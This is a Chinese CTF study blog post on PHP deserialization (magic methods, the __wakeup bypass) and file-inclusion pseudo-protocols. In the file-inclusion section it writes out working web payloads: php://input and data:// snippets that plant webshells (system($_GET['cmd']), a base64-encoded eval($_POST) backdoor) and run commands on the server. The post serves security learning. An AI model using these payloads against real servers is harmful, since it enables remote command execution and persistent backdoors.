ctf web-部分

原创 已于 2024-07-30 11:04:16 修改 · 1.1k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2024-04-29 01:29:12 首次发布
本文介绍了PHP反序列化和文件包含相关知识。反序列化通过serialize()和unserialize()函数实现,还介绍了常见魔法函数及__wakeup()绕过方法。PHP文件包含漏洞允许攻击者执行恶意操作,文中讲解了php://filter、php://input、data、file等协议在漏洞利用中的用法。

**

web基础知识

**

*一.反序列化

在PHP中,反序列化通常是指将序列化后的字节转换回原始的PHP对象或数据结构的过程。PHP中的序列化和反序列化通过serialize()和unserialize()函数实现。

1.序列化serialize()

序列化说通俗点就是把一个对象变成可以传输的字符串,比如下面是一个对象:
class S{
public $test=“pikachu”;
}
s=newS();//创建一个对象serialize(s=new S(); //创建一个对象 serialize(s=newS();//创建一个对象serialize(s); //把这个对象进行序列化
序列化后得到的结果是这个样子的:O:1:“S”:1:{s:4:“test”;s:7:“pikachu”;}
O:代表object
1:代表对象名字长度为一个字符
S:对象的名称
1:代表对象里面有一个变量
s:数据类型
4:变量名称的长度
test:变量名称
s:数据类型
7:变量值的长度
pikachu:变量值

2.反序列化unserialize()

就是把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。
$u=unserialize(“O:1:“S”:1:{s:4:“test”;s:7:“pikachu”;}”);
echo $u->test; //得到的结果为pikachu

3.PHP常见魔法函数

(1)__wakeup()
在PHP中如果需要进行反序列化,会先检查类中是否存在_wakeup()函数,如果存在,则会先调用此类方法,预先准备对象需要的资源。
(2)__sleep()
使用serialize时触发
(3)__destruct()
在对象的所有引用都被删除或类被销毁时自动调用
(4)__construct()
此函数会在创建一个类的实例时自动调用
(5)__toString()
此函数会在类被当作字符串时调用
(6)__get()
在读取不可访问的属性值时自动调用,例如读取私有变量
(7)__call()
调用未定义的方法时调用,例如调用实例化类中未定义的方法

4.序列化其属性

序列化对象:
private变量会被序列化为:\x00类名\x00变量名
protected变量会被序列化为: \x00*\x00变量名
public变量会被序列化为:变量名

5.__wakeup()绕过

版本限制
PHP5:<5.6.25
PHP7:<7.0.10
当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行
只需将O:1:“S”:1:{s:4:“test”;s:7:“pikachu”;}改成O:1:“S”:2:{s:4:“test”;s:7:“pikachu”;}即可绕过wakeup()

*二.PHP文件包含

PHP文件包含漏洞(File Inclusion Vulnerability)是一种安全漏洞,允许攻击者在应用程序中执行恶意的文件包含操作。这种漏洞通常出现在开发人员使用了不安全的文件包含函数时,例如include()、require()、include_once()、require_once()等,并且未正确过滤用户提供的输入。

1.php://filter伪协议

存在文件包含漏洞时,我们可以用php://filter进行文件的读取和写入,如读取flag.php文件,“?file=php://filter/read=convert.base64-encode/resource=flag.php”

2.php://input 协议

存在文件包含漏洞时,我们可以用php://input 命令执行也可直接写webshell

<?php fputs(fopen('my_shell.php','w'),'<?php system($_GET["cmd"]);?>');?>

#post方式提交base编码利用密码cc
<?php 
echo file_put_contents("test.php",base64_decode("PD9waHAgZXZhbCgkX1BPU1RbJ2NjJ10pPz4="));
?>

通常用法:执行<?php system("ls") ?>可查看文件,通常用来查找和读取flag文件位置,也配合php://filter进行读取
在这里插入图片描述

3.data 协议

其实data协议和input协议差不多,只是data是get方法,input是post方法,data伪协议配合命令来读取到的文件会在 PHP 脚本生成的 HTML 页面中显示。
用法:
读取文件:?c=data://text/plain,<?php system('cat fla*.php');?>
查找文件:?c=data://text/plain,<?php system('ls');?>
利用编码:data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
shell:data://text/plain,<?php eval($_POST[pass]);?>

4.file协议

file伪协议
file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。

在这里插入图片描述

AI_SumSky
关注
文件包含漏洞复现
ABUG
09-22 1013
文件包含攻击是一种利用Web应用程序的文件包含功能来执行任意文件的攻击方式。通过漏洞,攻击者可以读取敏感文件、执行恶意代码,甚至完全控制目标服务器。防御这种攻击的关键在于。
CTFHUB-web-信息泄漏
2401_84254530的博客
07-20 1457
Git是一个开源的分布式版本控制系统,在执行git init初始化目录的时候,会在当前目录下自动创建一个.git 目录,用来记录代码的变更记录等。通过了解知道vim缓存文件的后缀名为 .swp 根据提示我们知道flag在index.php中,而一般情况下vim缓存文件都是隐藏的,我们要找的他的flag就可以直接在.index.php后面跟一个.swp。这就引起了git泄露漏洞。但是我们在这么输入过后,得到的是“未找到”,但是却得到了一份文件,我们下载好这份文件,并使用记事本打开,就可以得到flag。
2024ctf-web -wp
2301_80915592的博客
11-22 2192
这个game就直接数组绕过,没什么说,然后two与flag限制了字符,所以要强碰撞,这⾥使⽤⼯具fastcoll,现将我们已知的写⼊⼀个txt⽂件中,在将⽂件拖到⼯具上就会⽣成两段加密后相等的md5值了,因为会纯在不可⻅字符,所以要将⽂件编码,这⾥给出php脚本,放在统⼀⽬录下,或者指定⽂件路径也⾏。结语:赣ctf对当时的我太难了,学了一段时间才来复现,也只是复现了一些php特性的题,后面的php反序列,还要什么pop本想钻一下,靶场关了,所以复现完这些代码题结束。}闭合前⾯的语句,然后⽤/*注释掉;
CTFHub----WEB-SSRF全网最详细的保姆级教程!!!!!!
2401_85783544的博客
07-24 1413
1.我们直接访问flag.php发现没有提交按钮,所以我们需要自己写一个按钮,前端的东西还是很容易修改 的, 把这个标签直接插入到下列html中去。2.在这里我们用的是第一个 file:///,去访问本地计算机中的文件,访问成功后看见有三个问号。file:///-------- 本地文件传输协议,主要用于访问本地计算机中的文件。3.,我们可以使用localhost来代替,也是本机的意思.成功获得flag。
CTFHUB-web-SQL注入
ookami6497的博客
11-29 1069
CTFHUB SQL
渗透学习-CTF-web-BUUCTF
qq_43696276的博客
01-17 2587
随着学习的不断深入,为了防止自己忘记之前所学的内容,于是我决定再不断的向下学习的同时做一些ctf的题来唤醒自己的记忆!!
CTFHub-Web--信息泄露
m0_69003772的博客
04-23 1846
CTF简介以及信息泄露下题目解题过程 文章目录 前言 一、基础知识 1.CTF简介 2.竞赛模式 2.1.理论知识 2.2.Jeopardy-解题 2.3.AwD-攻防模式 2.4.AWP-攻防增强 2.5.RHG-自动化[ AI自动化] 2.6RW-真实世界 2.7.KoH-抢占山头 2.8.Mix[混合] 3.比赛形式 3.1.线上 3.2.线下 4.题目类型 4.1.Web 4.2.Pwn 4.3.Reverse 4.4.C.
CTF----Web真零基础入门
热门推荐
B_cecretary的博客
01-17 2万+
前置知识: TCP/IP体系结构(IP和端口): IP是什么:是计算机在互联网上的唯一标识(坐标,代号),用于在互联网中寻找计算机。 访问网站时:域名会通过DNS(解析服务)解析成IP。 所以,互通的前提条件就是双方都能找到对方的IP地址。 内网(局域网)IP和公网(互联网)IP: 内网IP:路由以内的网络,可以连接互联网,但是互联网无法直接连接内网(需要端口映射) 如何判断自己的电脑是内网还是公网: --在本地电脑命令行输入jipconfig,ifconfig(Linux,macos)查看
CTF 竞赛必备神器 ——ctftools-all-in-one 深度解析与推荐》
wyb17870531028的博客
01-01 8261
在当今网络安全领域蓬勃发展的大背景下,网络安全竞赛(Capture The Flag,简称 CTF)已然成为精准衡量网络安全人才技能水平的关键平台。CTF 竞赛对参赛者有着颇高的要求,他们不仅要拥有扎实深厚的网络安全理论知识储备,更要具备在各种复杂的网络攻击和漏洞利用场景中迅速做出反应并有效应对的实际操作能力。然而,在实际的 CTF 竞赛进程中,参赛者们往往会遭遇诸多难题。例如在信息收集、漏洞利用、提权、文件传输等关键环节,这些过程通常需要借助多个不同的工具来协同完成,而且操作流程也较为复杂繁琐。
CTFHub - Web - 信息泄露 实战攻略
Yyexiaizhou的博客
08-13 844
CTFHub 是一个非常好的网络安全学习平台,在其中的 Web 部分,信息泄露是常见且重要的知识点。本文将详细介绍解决 CTFHub 中 Web - 信息泄露相关题目的过程。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8846
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
大学如何设置科研人员驻企服务的最短周期?.docx
12-16
大学如何设置科研人员驻企服务的最短周期?
ABAQUS仿真分析:金属压弯成型过程仿真(带参数化INP文件)
12-16
一、 内容概要 本资源提供了一个完整的“金属板材压弯成型”非线性仿真案例,基于ABAQUS/Explicit或Standard求解器完成。案例精确模拟了模具(凸模、凹模)与金属板材之间的接触、压合过程,直至板材发生塑性弯曲成型。 模型特点:包含完整的模具-工件装配体,定义了刚体约束、通用接触(或面面接触)及摩擦系数。 材料定义:金属板材采用弹塑性材料模型,定义了完整的屈服强度、塑性应变等真实应力-应变数据。 关键结果:提供了成型过程中的板材应力(Mises应力)、塑性应变(PE)、厚度变化​ 云图,以及模具受力(接触力)曲线,完整再现了压弯工艺的力学状态。 二、 适用人群 CAE工程师/工艺工程师:从事钣金冲压、模具设计、金属成型工艺分析与优化的专业人员。 高校师生:学习ABAQUS非线性分析、金属塑性成形理论,或从事相关课题研究的硕士/博士生。 结构设计工程师:需要评估钣金件可制造性(DFM)或预测成型回弹的设计人员。 三、 使用场景及目标 学习目标: 掌握在ABAQUS中设置金属塑性成形仿真的全流程,包括材料定义、复杂接触设置、边界条件与载荷步。 学习如何调试和分析大变形、非线性接触问题的收敛性技巧。 理解如何通过仿真预测成型缺陷(如减薄、破裂、回弹),并与理论或实验进行对比验证。 应用价值:本案例的建模方法与分析思路可直接应用于汽车覆盖件、电器外壳、结构件等钣金产品的冲压工艺开发与模具设计优化,减少试模成本。 四、 其他说明 资源包内包含参数化的INP文件、CAE模型文件、材料数据参考及一份简要的操作要点说明文档。INP文件便于用户直接修改关键参数(如压边力、摩擦系数、行程)进行自主研究。 建议使用ABAQUS 2022或更高版本打开。显式动力学分析(如用Explicit)对计算资源有一定要求。 本案例为教学与工程参考目的提供,用户可基于此框架进行拓展,应用于V型弯曲
游戏开发基于Unity的数据驱动玩法迭代:融合埋点系统、A/B测试与智能调优的实战分析平台构建
12-16
内容概要:本文围绕Unity游戏项目中的数据驱动玩法迭代,系统介绍了如何通过埋点系统、数据分析管道和A/B测试实现“玩法-数据-优化”闭环。文章结合Roguelike地牢游戏的难度调优案例,详细拆解了轻量级埋点、本地日志解析、核心指标计算(如留存率、平均时长)、可视化看板及A/B测试框架的实现原理,并提供了完整的C#代码示例。同时展望了实时数据流处理、因果推断建模与隐私合规等未来发展方向。; 适合人群:具备Unity开发基础,从事游戏研发1-3年的程序员或技术策划,尤其是关注玩法调优与数据驱动设计的从业者; 使用场景及目标:①构建低成本、可落地的数据采集与分析系统;②通过A/B测试科学验证玩法改动效果;③提升游戏难度平衡、用户留存与转化率等核心指标; 阅读建议:建议结合文中提供的代码模块在实际项目中动手实践,重点关注埋点设计的灵活性、数据计算的准确性以及实验分组的稳定性,同时注意生产环境中应升级为服务器上报与专业分析平台对接。
高等院校如何通过知识图谱发现潜在投资人?.docx
12-16
高等院校如何通过知识图谱发现潜在投资人?
大学如何设置基金联动模式的跟投比例上限?.docx
12-16
大学如何设置基金联动模式的跟投比例上限?
draw.io-29.0.3-windows-installer.exe
最新发布
12-16
draw.io-29.0.3-windows-installer.exe
大学如何利用科技保险覆盖中试阶段风险?.docx
12-16
大学如何利用科技保险覆盖中试阶段风险?
高等院校如何通过平台DEMO快速验证商业模式?.docx
12-16
高等院校如何通过平台DEMO快速验证商业模式?
CTFweb-study
03-12
### CTF Web 安全挑战的学习资源 对于希望深入理解并参与CTF(夺旗竞赛)Web安全挑战的人来说,获取高质量的学习材料至关重要。这些资源不仅帮助参与者掌握基础概念和技术细节,还提供了实践机会来应用所学知识。 #### 推荐书籍与在线课程 一些优秀的书籍和在线平台专注于教授Web漏洞挖掘技巧以及防御措施。例如,《Web Application Hacker's Handbook》全面介绍了各种攻击向量及其对应的防护策略;Coursera上的《Cybersecurity Specialization》系列课程也涵盖了大量有关网络攻防的知识点[^1]。 #### 实践练习网站 为了更好地准备比赛中的实际操作部分,建议访问专门设计用于训练的安全测试环境。像HackTheBox、Try Hack Me这样的站点提供了一系列难度渐进的任务场景供玩家探索,而PWNABLE则更侧重于二进制逆向工程等方面的能力培养[^2]。 #### 社区交流论坛 加入活跃的技术讨论群组能够加速个人成长过程。Reddit下的r/netsec板块汇聚了许多信息安全爱好者分享见解;还有官方CTF赛事主办方设立的Discord服务器也是不错的选择之一,这里可以找到志同道合的朋友共同探讨难题解决方案。 ```python import requests def fetch_ctf_challenges(): url = 'https://example.com/challenges' response = requests.get(url) if response.status_code == 200: challenges = response.json() return challenges['data'] else: raise Exception('Failed to load data') challenges = fetch_ctf_challenges() print(challenges[:5]) # 打印前五个挑战题目概要信息 ``` 此段Python代码展示了如何通过API接口获取某一站点发布的最新CTF挑战列表,并打印其中部分内容作为示例展示给读者了解可能存在的交互形式。
评论 4
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值